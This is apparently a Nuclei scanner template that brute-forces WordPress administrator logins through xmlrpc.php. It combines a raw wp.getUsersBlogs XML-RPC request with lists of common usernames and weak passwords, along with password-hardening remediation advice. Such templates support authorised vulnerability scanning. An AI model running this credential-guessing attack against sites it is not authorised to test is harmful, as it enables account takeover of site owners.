id: wordpress-xmlrpc-brute-force
info:
  name: Wordpress XMLRPC.php username and password Bruteforcer
  author:
  - l0ne1y
  description: |-
    Wordpress XMLRPC.php brute force weak password vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers.
    Wordpress XMLRPC.php can obtain the background password through brute force cracking.
  severity: high
  remediation: |-
    1. It is recommended that system administrators immediately change the discovered weak passwords to strong passwords, and conduct a network search for weak passwords of all system administrators, users, and devices, and clean up undiscovered weak passwords.
    2. Weak passwords focus on management. Enterprises should develop a strong password system (for example: passwords must contain at least three formats of uppercase and lowercase letters, numbers, and special characters, with a length of no less than ten digits, and the password keyboard must be arranged in an disordered manner, and passwords must be unrelated to company and personal information.
    3. There are two ways to check for weak passwords: self-checking by aggregating all accounts of the company's personnel and matching strong password rules, and brute force cracking using a personalized dictionary.
    4. It is recommended to generate strong passwords online: [https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)
    5. Recommended password strength online testing: [https://howsecureismypassword.net/](https://howsecureismypassword.net/)
requests:
- matchers:
  - type: status
    status:
    - 200
  - type: word
    condition: and
    part: body
    words:
    - url
    - xmlrpc
    - isAdmin
  matchers-condition: and
  raw:
  - |
    POST /xmlrpc.php HTTP/1.1
    Host: {{Hostname}}
    Content-Length: 235

    <?xml version="1.0" encoding="UTF-8"?>
     <methodCall>
       <methodName>wp.getUsersBlogs</methodName>
       <params>
         <param>
           <value>{{username}}</value>
         </param>
           <param>
         <value>{{password}}</value>
           </param>
       </params>
     </methodCall>
  attack: clusterbomb
  payloads:
    password:
    - admin
    - root
    - "123456"
    - "123123"
    - "111111"
    - "000000"
    username:
    - admin
    - root
